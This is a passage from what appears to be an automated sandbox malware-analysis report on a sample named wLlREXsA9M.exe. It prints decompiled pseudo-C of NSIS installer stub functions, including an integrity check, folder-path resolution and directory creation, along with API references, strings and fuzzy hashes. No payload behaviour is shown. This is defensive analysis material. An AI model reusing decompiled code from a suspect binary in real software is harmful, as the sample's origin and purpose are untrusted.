				E00405D8D(0x42b000, E00405846(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x4168c4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402C96(1);
					__eflags =  *0x423714 - _t82;
					if( *0x423714 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc("true", _v24); // executed
						_t94 = _t53;
						E00403125( *0x423714 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402F33(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423710 = _t94;
							 *0x423718 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42371c =  *0x42371c + 1;
								__eflags =  *0x42371c;
							}
							_push("true");
							_t59 = _t94 + 0x44;
							_pop(_t85);
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E004059BB(0x423720, _t94 + 4, "true");
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403125( *0x40a8b8);
					_t65 = E0040310F( &_a4, "true");
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x423714) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E0040310F(0x4168c8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402C96(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423714;
						if( *0x423714 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402C96(0);
							}
							goto L20;
						}
						E004059BB( &_v44, 0x4168c8, "true");
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40a8b8; // 0x5d62d
						 *0x4237a0 =  *0x4237a0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423714 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x409194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x4168c4; // 0x5e078
						if(__eflags < 0) {
							_v12 = E0040619B(_v12, 0x4168c8, _t90);
						}
						 *0x40a8b8 =  *0x40a8b8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402d02
0x00402d05
0x00402d08
0x00402d0b
0x00402d11
0x00402d22
0x00402d27
0x00402d3a
0x00402d3f
0x00402d42
0x00402d48
0x00000000
0x00402d4a
0x00402d55
0x00402d5b
0x00402d6c
0x00402d73
0x00402d79
0x00402d7b
0x00402d80
0x00402d82
0x00402e6f
0x00402e71
0x00402e76
0x00402e7d
0x00000000
0x00000000
0x00402e7f
0x00402e82
0x00402ea6
0x00402eab
0x00402eb1
0x00402ebc
0x00402ec1
0x00402ec4
0x00402ec5
0x00402ec6
0x00402ec8
0x00402ecd
0x00402ed0
0x00402ee3
0x00402ee7
0x00402eef
0x00402ef4
0x00402ef6
0x00402ef6
0x00402ef6
0x00402efc
0x00402efe
0x00402f01
0x00402f02
0x00402f02
0x00402f05
0x00402f07
0x00402f07
0x00402f07
0x00402f11
0x00402f17
0x00402f25
0x00402f2a
0x00000000
0x00402f2a
0x00000000
0x00402ed0
0x00402e8a
0x00402e95
0x00402e9a
0x00402e9c
0x00000000
0x00000000
0x00402ea1
0x00402ea4
0x00000000
0x00000000
0x00000000
0x00402d88
0x00402d8d
0x00402d92
0x00402d96
0x00402d9d
0x00402da2
0x00402da4
0x00402da6
0x00402da6
0x00402daa
0x00402daf
0x00402db1
0x00402edb
0x00402ed2
0x00000000
0x00402ed2
0x00402db7
0x00402dbe
0x00402e3a
0x00402e3e
0x00402e42
0x00402e47
0x00000000
0x00402e3e
0x00402dc7
0x00402dcc
0x00402dcf
0x00402dd4
0x00000000
0x00000000
0x00402dd6
0x00402ddd
0x00000000
0x00000000
0x00402ddf
0x00402de6
0x00000000
0x00000000
0x00402de8
0x00402def
0x00000000
0x00000000
0x00402df1
0x00402df8
0x00000000
0x00000000
0x00402dfa
0x00402e00
0x00402e09
0x00402e0f
0x00402e12
0x00402e14
0x00402e1a
0x00000000
0x00000000
0x00402e20
0x00402e24
0x00402e2c
0x00402e2c
0x00402e2f
0x00402e2f
0x00402e32
0x00402e34
0x00402e36
0x00402e36
0x00000000
0x00402e34
0x00402e26
0x00402e2a
0x00000000
0x00000000
0x00000000
0x00402e48
0x00402e48
0x00402e4e
0x00402e5a
0x00402e5a
0x00402e5d
0x00402e63
0x00402e65
0x00402e65
0x00402e6d
0x00402e6d
0x00000000
0x00402e6d

APIs

GetTickCount.KERNEL32 ref: 00402D0B
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\wLlREXsA9M.exe,00000400), ref: 00402D27

Part of subcall function 00405A00: GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\wLlREXsA9M.exe,80000000,00000003), ref: 00405A04
Part of subcall function 00405A00: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A26

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\wLlREXsA9M.exe,C:\Users\user\Desktop\wLlREXsA9M.exe,80000000,00000003), ref: 00402D73

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED2
Error launching installer, xrefs: 00402D4A
C:\Users\user\Desktop, xrefs: 00402D55, 00402D5A, 00402D60
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D01
C:\Users\user\Desktop\wLlREXsA9M.exe, xrefs: 00402D11, 00402D20, 00402D34, 00402D54
soft, xrefs: 00402DE8
Inst, xrefs: 00402DDF
"C:\Users\user\Desktop\wLlREXsA9M.exe", xrefs: 00402CFA
Null, xrefs: 00402DF1

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\wLlREXsA9M.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\wLlREXsA9M.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-1146377700
Opcode ID: 9479f503253987999605a529853d67c87d13567470de16844368a201e3e32331
Instruction ID: 47d741a00c679b45a8cca03e7e03a7d8b7456fa301de4a34b2e63ef34326ff68
Opcode Fuzzy Hash: 9479f503253987999605a529853d67c87d13567470de16844368a201e3e32331
Instruction Fuzzy Hash: 6A51E9B2940214ABDB209F65DE89B9E7BB8EB04355F10413BF900B62D1D7BC8D418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405DAF Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00405DAF(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t37;
				CHAR* _t38;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t70;
				signed int _t75;
				signed int _t76;
				intOrPtr _t80;
				char _t82;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t96;
				signed int _t98;
				void* _t99;

				_t89 = __esi;
				_t86 = __edi;
				_t64 = __ebx;
				_t37 = _a8;
				if(_t37 < 0) {
					_t80 =  *0x422edc; // 0x776280
					_t37 =  *(_t80 - 4 + _t37 * 4);
				}
				_push(_t64);
				_t75 =  *0x423738 + _t37;
				_t38 = 0x4226a0;
				_push(_t89);
				_push(_t86);
				_t87 = 0x4226a0;
				if(_a4 >= 0x4226a0 && _a4 - 0x4226a0 < 0x800) {
					_t87 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t82 =  *_t75;
					if(_t82 == 0) {
						break;
					}
					__eflags = _t87 - _t38 - 0x400;
					if(_t87 - _t38 >= 0x400) {
						break;
					}
					_t75 = _t75 + 1;
					__eflags = _t82 - 4;
					_a8 = _t75;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t82;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t75;
							_t87 =  &(_t87[1]);
							_t75 = _t75 + 1;
						}
						continue;
					}
					_t40 =  *(_t75 + 1);
					_t76 =  *_t75;
					_t96 = (_t40 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t76 | 0x00000080;
					_t70 = _t76;
					_v24 = _t70;
					__eflags = _t82 - 2;
					_v20 = _t40 | 0x00000080;
					_v16 = _t40;
					if(_t82 != 2) {
						__eflags = _t82 - 3;
						if(_t82 != 3) {
							__eflags = _t82 - 1;
							if(_t82 == 1) {
								__eflags = (_t40 | 0xffffffff) - _t96;
								E00405DAF(_t70, _t87, _t96, _t87, (_t40 | 0xffffffff) - _t96);
							}
							L42:
							_t41 = lstrlenA(_t87);
							_t75 = _a8;
							_t87 =  &(_t87[_t41]);
							_t38 = 0x4226a0;
							continue;
						}
						__eflags = _t96 - 0x1d;
						if(_t96 != 0x1d) {
							__eflags = (_t96 << 0xa) + 0x424000;
							E00405D8D(_t87, (_t96 << 0xa) + 0x424000);
						} else {
							E00405CEB(_t87,  *0x423708);
						}
						__eflags = _t96 + 0xffffffeb - 7;
						if(_t96 + 0xffffffeb < 7) {
							L33:
							E00405FF8(_t87);
						}
						goto L42;
					}
					_t98 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x423784;
						if( *0x423784 != 0) {
							_push("true");
							_pop(_t98);
						}
						__eflags = _t70;
						if(_t70 >= 0) {
							__eflags = _t70 - 0x25;
							if(_t70 != 0x25) {
								__eflags = _t70 - 0x24;
								if(_t70 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x400);
									_t98 = 0;
								}
								while(1) {
									__eflags = _t98;
									if(_t98 == 0) {
										goto L30;
									}
									_t52 =  *0x423704;
									_t98 = _t98 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L26:
										_t54 = SHGetSpecialFolderLocation( *0x423708,  *(_t99 + _t98 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t87);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t56 =  *_t52( *0x423708,  *(_t99 + _t98 * 4 - 0x18), 0, 0, _t87); // executed
									__eflags = _t56;
									if(_t56 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x400);
							goto L30;
						} else {
							_t73 = (_t70 & 0x0000003f) +  *0x423738;
							E00405C74(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t70 & 0x0000003f) +  *0x423738, _t87, _t70 & 0x00000040);
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405DAF(_t73, _t87, _t98, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t38;
				}
				return E00405D8D(_a4, _t38);
			}

0x00405daf
0x00405daf
0x00405daf
0x00405db5
0x00405dba
0x00405dbc
0x00405dcb
0x00405dcb
0x00405dd3
0x00405dd4
0x00405dd6
0x00405dde
0x00405ddf
0x00405de0
0x00405de2
0x00405df9
0x00405dfc
0x00405dfc
0x00405fd5
0x00405fd5
0x00405fd9
0x00000000
0x00000000
0x00405e09
0x00405e0f
0x00000000
0x00000000
0x00405e15
0x00405e16
0x00405e19
0x00405e1c
0x00405fc8
0x00405fd2
0x00405fd4
0x00405fd4
0x00405fca
0x00405fcc
0x00405fce
0x00405fcf
0x00405fcf
0x00000000
0x00405fc8
0x00405e22
0x00405e26
0x00405e36
0x00405e3a
0x00405e41
0x00405e44
0x00405e48
0x00405e4e
0x00405e51
0x00405e54
0x00405e57
0x00405f72
0x00405f75
0x00405fa5
0x00405fa8
0x00405fad
0x00405fb1
0x00405fb1
0x00405fb6
0x00405fb7
0x00405fbc
0x00405fbf
0x00405fc1
0x00000000
0x00405fc1
0x00405f77
0x00405f7a
0x00405f8f
0x00405f96
0x00405f7c
0x00405f83
0x00405f83
0x00405f9e
0x00405fa1
0x00405f6a
0x00405f6b
0x00405f6b
0x00000000
0x00405fa1
0x00405e5f
0x00405e60
0x00405e66
0x00405e68
0x00405e82
0x00405e82
0x00405e89
0x00405e89
0x00405e90
0x00405e92
0x00405e94
0x00405e94
0x00405e95
0x00405e97
0x00405ed0
0x00405ed3
0x00405ee3
0x00405ee6
0x00405eee
0x00405ef4
0x00405ef4
0x00405f50
0x00405f50
0x00405f52
0x00000000
0x00000000
0x00405ef8
0x00405eff
0x00405f00
0x00405f02
0x00405f1c
0x00405f2a
0x00405f30
0x00405f32
0x00405f4d
0x00405f4d
0x00405f4d
0x00000000
0x00405f4d
0x00405f38
0x00405f43
0x00405f49
0x00405f4b
0x00000000
0x00000000
0x00000000
0x00405f4b
0x00405f04
0x00405f07
0x00000000
0x00000000
0x00405f16
0x00405f18
0x00405f1a
0x00000000
0x00000000
0x00000000
0x00405f1a
0x00000000
0x00405f50
0x00405edb
0x00000000
0x00405e99
0x00405e9e
0x00405eb4
0x00405eb9
0x00405ebc
0x00405f59
0x00405f59
0x00405f5d
0x00405f65
0x00405f65
0x00000000
0x00405f5d
0x00405ec6
0x00405f54
0x00405f54
0x00405f57
0x00000000
0x00000000
0x00000000
0x00405f57
0x00405e97
0x00405e6a
0x00405e6e
0x00000000
0x00000000
0x00405e70
0x00405e74
0x00000000
0x00000000
0x00405e76
0x00405e7a
0x00000000
0x00405e7c
0x00405e7c
0x00000000
0x00405e7c
0x00405e7a
0x00405fdf
0x00405fe9
0x00405ff5
0x00405ff5
0x00000000

APIs

GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000,00404FDE,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000), ref: 00405E60
GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405EDB
GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405EEE
SHGetSpecialFolderLocation.SHELL32(?,0040E8C0), ref: 00405F2A
SHGetPathFromIDListA.SHELL32(0040E8C0,Call), ref: 00405F38
CoTaskMemFree.OLE32(0040E8C0), ref: 00405F43
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F65
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000,00404FDE,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000), ref: 00405FB7

Strings

Call, xrefs: 00405DD6, 00405EA8, 00405EC5, 00405EDA, 00405EED, 00405F09, 00405F34, 00405F64, 00405F6A, 00405F82, 00405F95, 00405FB0, 00405FB6, 00405FC1, 00405FEB
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405F5F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405EAA
Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll, xrefs: 00405DDE

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-2516453840
Opcode ID: e57bde13a3ce28464dd087e4cc926d744cd5fee8b1e2ea9ac4f193307b0a4faa
Instruction ID: 1b13125c1f283887e3ab2ac7e68f102f2333d45dbd6de6a29cf408c74da26d42
Opcode Fuzzy Hash: e57bde13a3ce28464dd087e4cc926d744cd5fee8b1e2ea9ac4f193307b0a4faa
Instruction Fuzzy Hash: 0E611371A04A06AEDF205F64CC84BBB7BA4EB55314F14813BEA41BA2D0D37C4A81DF5E

Uniqueness

Uniqueness Score: -1.00%

Function 00404FA6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404FA6(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x422ee4; // 0x10434
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4237b4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405DAF(0, _t39, 0x41f4e8, 0x41f4e8, _a4);
					}
					_t26 = lstrlenA(0x41f4e8);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x422ec8, 0x41f4e8); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41f4e8;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41f4e8)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41f4e8, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404fac
0x00404fb8
0x00404fbb
0x00404fc1
0x00404fcd
0x00404fd0
0x00404fd3
0x00404fd9
0x00404fd9
0x00404fdf
0x00404fe7
0x00404fea
0x00405007
0x0040500b
0x00405014
0x00405014
0x0040501e
0x00405027
0x00405033
0x0040503a
0x0040503e
0x00405041
0x00405054
0x00405062
0x00405062
0x00405066
0x00405068
0x0040506b
0x00000000
0x0040506b
0x00404fec
0x00404ff4
0x00404ffc
0x00405002
0x00000000
0x00405002
0x00404ffc
0x00404fea
0x00405075

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00403063,00000000,?), ref: 00404FDF
lstrlenA.KERNEL32(00403063,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00403063,00000000), ref: 00404FEF
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00403063,00403063,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,00000000,0040E8C0,00000000), ref: 00405002
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll), ref: 00405014
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040503A
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405054
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405062

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll, xrefs: 00404FC6, 00404FD8, 00404FDE, 00405001, 0040500D

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll
API String ID: 2531174081-3620488577
Opcode ID: 7807df4f356ea8157868d104e1ce756945f1af52411ab180d12a31a7a846d162
Instruction ID: bd0571f5b49e37d16436173a08ac1d4af63627cfe3f7273f46c6fe06101aa224
Opcode Fuzzy Hash: 7807df4f356ea8157868d104e1ce756945f1af52411ab180d12a31a7a846d162
Instruction Fuzzy Hash: 6E218C71A00518BBDF119FA5CD84ADFBFA9EF44354F14807AF904B6291C2798A81CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040546C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040546C(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407374;
				_v36.Group = 0x407374;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407364;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405477
0x0040547b
0x0040547e
0x00405484
0x00405488
0x0040548c
0x00405494
0x0040549b
0x004054a1
0x004054a8
0x004054af
0x004054b7
0x004054b9
0x00000000
0x004054b9
0x004054c3
0x004054ca
0x004054e0
0x00000000
0x00000000
0x00000000
0x004054e2
0x004054e6

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054AF
GetLastError.KERNEL32 ref: 004054C3
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004054D8
GetLastError.KERNEL32 ref: 004054E2

Strings

C:\Users\user\Desktop, xrefs: 0040546C
C:\Users\user\AppData\Local\Temp\, xrefs: 00405492
ds@, xrefs: 004054A1
ts@, xrefs: 00405472

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-2230009264
Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction ID: b3bc3247d238475575fe1f8439b7d1b146af7d5e42e82d4b9271d1aace67d763
Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction Fuzzy Hash: 26010871D14259EAEF11DBA0CD447EFBFB8EB04315F004176E904B6290E378A644CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 004060B8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004060B8(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
